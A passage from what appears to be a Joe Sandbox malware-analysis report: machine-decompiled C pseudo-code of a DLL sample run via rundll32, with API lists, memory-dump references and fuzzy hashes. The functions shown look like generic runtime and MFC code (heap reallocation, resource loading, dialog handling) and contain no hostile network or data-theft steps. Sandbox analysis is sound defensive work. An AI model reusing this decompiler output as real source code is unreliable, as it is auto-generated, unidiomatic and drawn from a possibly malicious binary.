								goto L5;
							}
							_t64 = InterlockedExchange(0x1004f5d8, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1004f5d8, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1004f598 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1004f590; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1004f590 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}



































                                                                        0x10014699
                                                                        0x1001469c
                                                                        0x100146a2
                                                                        0x100146bf
                                                                        0x00000000
                                                                        0x100146bf
                                                                        0x100146aa
                                                                        0x100146ad
                                                                        0x100146b0
                                                                        0x100146b5
                                                                        0x100146b8
                                                                        0x100146c7
                                                                        0x100146ca
                                                                        0x100146cd
                                                                        0x100146d7
                                                                        0x100146d7
                                                                        0x100146d9
                                                                        0x100146dc
                                                                        0x100146de
                                                                        0x100146de
                                                                        0x100146e0
                                                                        0x100146e3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100146e5
                                                                        0x100146e7
                                                                        0x10014832
                                                                        0x10014832
                                                                        0x100148b5
                                                                        0x00000000
                                                                        0x100148b5
                                                                        0x100146ed
                                                                        0x100146ed
                                                                        0x100146f1
                                                                        0x100146f3
                                                                        0x100146f3
                                                                        0x100146f3
                                                                        0x100146f3
                                                                        0x100146f6
                                                                        0x100146f7
                                                                        0x100146fa
                                                                        0x100146fa
                                                                        0x100146fe
                                                                        0x10014702
                                                                        0x10014718
                                                                        0x10014718
                                                                        0x1001471f
                                                                        0x10014725
                                                                        0x10014727
                                                                        0x10014729
                                                                        0x1001473d
                                                                        0x10014744
                                                                        0x1001474a
                                                                        0x1001474c
                                                                        0x100148b2
                                                                        0x100148b2
                                                                        0x100148b2
                                                                        0x00000000
                                                                        0x100148b2
                                                                        0x10014752
                                                                        0x10014759
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001475f
                                                                        0x10014763
                                                                        0x100147bb
                                                                        0x100147c2
                                                                        0x100147c8
                                                                        0x100147ca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147d0
                                                                        0x100147d6
                                                                        0x100147d8
                                                                        0x100147da
                                                                        0x100147ef
                                                                        0x100147ef
                                                                        0x100147f1
                                                                        0x10014820
                                                                        0x10014827
                                                                        0x00000000
                                                                        0x10014827
                                                                        0x100147f5
                                                                        0x100147f6
                                                                        0x100147f8
                                                                        0x100147fa
                                                                        0x100147fa
                                                                        0x100147fc
                                                                        0x100147fe
                                                                        0x10014800
                                                                        0x10014814
                                                                        0x10014814
                                                                        0x10014817
                                                                        0x10014819
                                                                        0x10014819
                                                                        0x1001481a
                                                                        0x1001481a
                                                                        0x00000000
                                                                        0x10014802
                                                                        0x10014802
                                                                        0x10014802
                                                                        0x1001480b
                                                                        0x1001480c
                                                                        0x1001480e
                                                                        0x10014810
                                                                        0x10014810
                                                                        0x00000000
                                                                        0x10014802
                                                                        0x10014800
                                                                        0x100147dc
                                                                        0x100147e3
                                                                        0x100147e3
                                                                        0x100147e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147e7
                                                                        0x100147e8
                                                                        0x100147eb
                                                                        0x100147ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147ed
                                                                        0x00000000
                                                                        0x100147e3
                                                                        0x10014765
                                                                        0x10014768
                                                                        0x1001476d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014776
                                                                        0x10014778
                                                                        0x1001477e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014784
                                                                        0x1001478a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014790
                                                                        0x10014792
                                                                        0x1001479b
                                                                        0x1001479f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147a5
                                                                        0x100147a8
                                                                        0x100147aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147b1
                                                                        0x100147b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147b5
                                                                        0x100147b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001472b
                                                                        0x1001472b
                                                                        0x1001472b
                                                                        0x10014732
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014738
                                                                        0x10014739
                                                                        0x1001473b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001473b
                                                                        0x10014836
                                                                        0x10014838
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001484b
                                                                        0x1001484d
                                                                        0x1001484f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014855
                                                                        0x1001485c
                                                                        0x1001488c
                                                                        0x1001488c
                                                                        0x1001488e
                                                                        0x10014890
                                                                        0x100148a4
                                                                        0x100148ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014892
                                                                        0x10014892
                                                                        0x10014892
                                                                        0x1001489b
                                                                        0x1001489c
                                                                        0x1001489e
                                                                        0x100148a0
                                                                        0x100148a0
                                                                        0x00000000
                                                                        0x10014892
                                                                        0x1001485e
                                                                        0x10014863
                                                                        0x10014863
                                                                        0x10014866
                                                                        0x10014868
                                                                        0x1001487a
                                                                        0x1001487a
                                                                        0x1001487d
                                                                        0x1001487f
                                                                        0x1001487f
                                                                        0x10014880
                                                                        0x10014880
                                                                        0x10014885
                                                                        0x10014885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x10014871
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014873
                                                                        0x10014873
                                                                        0x10014874
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014874
                                                                        0x10014876
                                                                        0x10014878
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x10014878
                                                                        0x10014704
                                                                        0x10014707
                                                                        0x1001470a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014710
                                                                        0x10014712
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014712
                                                                        0x100146cf
                                                                        0x100146d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlocked$QueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2947987494-0
                                                                        • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                        • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001234F Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x10041dc0);
				E10012514(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x10050a64 - 3;
						if( *0x10050a64 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10014676(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10013A38(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10013B9B(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E100124B7();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x10050a50; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E1001409B();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E1001437A();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011440( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10013B9B(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10013BC6();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011440( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10013BC6();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10014676(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E100107C8(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E100107B6( *(_t67 + 0xc));
					L37:
					return E1001254F(_t28);
				}
			}
















                                                                        0x1001234f
                                                                        0x10012351
                                                                        0x10012356
                                                                        0x1001235b
                                                                        0x10012362
                                                                        0x10012372
                                                                        0x10012375
                                                                        0x10012377
                                                                        0x10012385
                                                                        0x1001238c
                                                                        0x100124c0
                                                                        0x100124c0
                                                                        0x100124c2
                                                                        0x100124c5
                                                                        0x100124c7
                                                                        0x100124c9
                                                                        0x100124cd
                                                                        0x100124cd
                                                                        0x100124cd
                                                                        0x100124d7
                                                                        0x100124d7
                                                                        0x100124dd
                                                                        0x100124df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100124e1
                                                                        0x100124e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100124ea
                                                                        0x100124f0
                                                                        0x100124f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100124f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012392
                                                                        0x10012392
                                                                        0x10012392
                                                                        0x10012395
                                                                        0x10012398
                                                                        0x1001248f
                                                                        0x1001248f
                                                                        0x10012492
                                                                        0x10012494
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012496
                                                                        0x1001249c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001249c
                                                                        0x100123a0
                                                                        0x100123a6
                                                                        0x100123aa
                                                                        0x100123b0
                                                                        0x100123b3
                                                                        0x100123b5
                                                                        0x1001245f
                                                                        0x1001245f
                                                                        0x10012463
                                                                        0x10012468
                                                                        0x1001246b
                                                                        0x1001246d
                                                                        0x1001246f
                                                                        0x10012473
                                                                        0x10012473
                                                                        0x10012473
                                                                        0x10012477
                                                                        0x10012477
                                                                        0x1001247a
                                                                        0x1001248c
                                                                        0x1001248c
                                                                        0x00000000
                                                                        0x1001246b
                                                                        0x100123bb
                                                                        0x100123c1
                                                                        0x100123c3
                                                                        0x100123c4
                                                                        0x100123c5
                                                                        0x100123c6
                                                                        0x100123cb
                                                                        0x100123ce
                                                                        0x100123d0
                                                                        0x100123d7
                                                                        0x100123d8
                                                                        0x100123de
                                                                        0x100123e1
                                                                        0x100123e3
                                                                        0x100123e8
                                                                        0x100123e9
                                                                        0x100123ec
                                                                        0x100123ee
                                                                        0x100123f0
                                                                        0x100123f0
                                                                        0x100123f7
                                                                        0x100123fd
                                                                        0x10012402
                                                                        0x10012405
                                                                        0x10012406
                                                                        0x10012407
                                                                        0x1001240c
                                                                        0x1001240c
                                                                        0x100123d2
                                                                        0x100123d2
                                                                        0x100123d2
                                                                        0x100123d0
                                                                        0x1001240f
                                                                        0x10012412
                                                                        0x10012414
                                                                        0x10012416
                                                                        0x1001241a
                                                                        0x1001241a
                                                                        0x1001241b
                                                                        0x1001241b
                                                                        0x10012421
                                                                        0x10012424
                                                                        0x1001242f
                                                                        0x10012435
                                                                        0x10012438
                                                                        0x1001243a
                                                                        0x1001243f
                                                                        0x10012440
                                                                        0x10012443
                                                                        0x10012445
                                                                        0x10012447
                                                                        0x10012447
                                                                        0x1001244e
                                                                        0x10012453
                                                                        0x10012454
                                                                        0x10012457
                                                                        0x1001245c
                                                                        0x1001245c
                                                                        0x1001243a
                                                                        0x00000000
                                                                        0x1001249e
                                                                        0x1001249f
                                                                        0x100124a5
                                                                        0x100124a5
                                                                        0x00000000
                                                                        0x10012379
                                                                        0x10012379
                                                                        0x1001237a
                                                                        0x100124f4
                                                                        0x100124f4
                                                                        0x100124f4
                                                                        0x00000000
                                                                        0x100124f4
                                                                        0x10012364
                                                                        0x10012367
                                                                        0x100124f6
                                                                        0x100124fb
                                                                        0x100124fb

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                        • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100071BF Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E100373B5() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10006D96( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F77E(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001E118(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DF55(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10006D96( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}



























                                                                        0x100071cd
                                                                        0x100071cf
                                                                        0x100071d2
                                                                        0x100071d5
                                                                        0x100071dc
                                                                        0x100071e8
                                                                        0x100071f0
                                                                        0x100071f4
                                                                        0x100071fc
                                                                        0x100071ff
                                                                        0x00000000
                                                                        0x10007201
                                                                        0x1000720f
                                                                        0x1000720f
                                                                        0x100071f0
                                                                        0x10007212
                                                                        0x10007215
                                                                        0x10007218
                                                                        0x1000721b
                                                                        0x10007222
                                                                        0x1000722d
                                                                        0x10007230
                                                                        0x10007234
                                                                        0x10007237
                                                                        0x1000723c
                                                                        0x1000723c
                                                                        0x10007237
                                                                        0x10007242
                                                                        0x10007245
                                                                        0x10007247
                                                                        0x10007328
                                                                        0x00000000
                                                                        0x1000724d
                                                                        0x1000724d
                                                                        0x10007250
                                                                        0x10007254
                                                                        0x10007256
                                                                        0x10007259
                                                                        0x1000725c
                                                                        0x1000726c
                                                                        0x1000726c
                                                                        0x1000726f
                                                                        0x10007271
                                                                        0x10007274
                                                                        0x10007277
                                                                        0x1000727d
                                                                        0x1000727d
                                                                        0x10007280
                                                                        0x10007282
                                                                        0x100072b8
                                                                        0x100072b8
                                                                        0x100072bb
                                                                        0x100072be
                                                                        0x100072c2
                                                                        0x100072c5
                                                                        0x100072ce
                                                                        0x100072d0
                                                                        0x100072d3
                                                                        0x100072fa
                                                                        0x100072fa
                                                                        0x100072d5
                                                                        0x100072de
                                                                        0x100072e6
                                                                        0x100072ec
                                                                        0x100072f0
                                                                        0x100072f3
                                                                        0x100072f6
                                                                        0x100072f6
                                                                        0x100072ff
                                                                        0x10007302
                                                                        0x10007306
                                                                        0x10007307
                                                                        0x10007313
                                                                        0x10007309
                                                                        0x10007309
                                                                        0x1000730c
                                                                        0x1000730c
                                                                        0x10007307
                                                                        0x00000000
                                                                        0x100072c5
                                                                        0x10007284
                                                                        0x10007287
                                                                        0x1000728d
                                                                        0x10007290
                                                                        0x00000000
                                                                        0x10007292
                                                                        0x10007292
                                                                        0x10007295
                                                                        0x10007297
                                                                        0x1000729a
                                                                        0x100072b2
                                                                        0x1000729c
                                                                        0x100072ad
                                                                        0x100072ad
                                                                        0x1000729a
                                                                        0x10007318
                                                                        0x1000731b
                                                                        0x1000731c
                                                                        0x1000731f
                                                                        0x1000731f
                                                                        0x1000727d
                                                                        0x00000000
                                                                        0x10007277

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                        • LockResource.KERNEL32(00000000), ref: 10007209
                                                                        • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                        • GetDlgItem.USER32 ref: 100072E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeItemLoadLock
                                                                        • String ID:
                                                                        • API String ID: 996205394-0
                                                                        • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                        • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10009B77 Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E10009B77(void* __ebx, void* __ecx) {
				void* _t62;
				long _t63;
				void* _t76;

				E10011BF0(0x1003ae2b, _t76);
				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t76 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E1000A369( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							__eflags = __ecx;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							__eflags =  *(__esi + 0x58) - 0xffffffff;
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
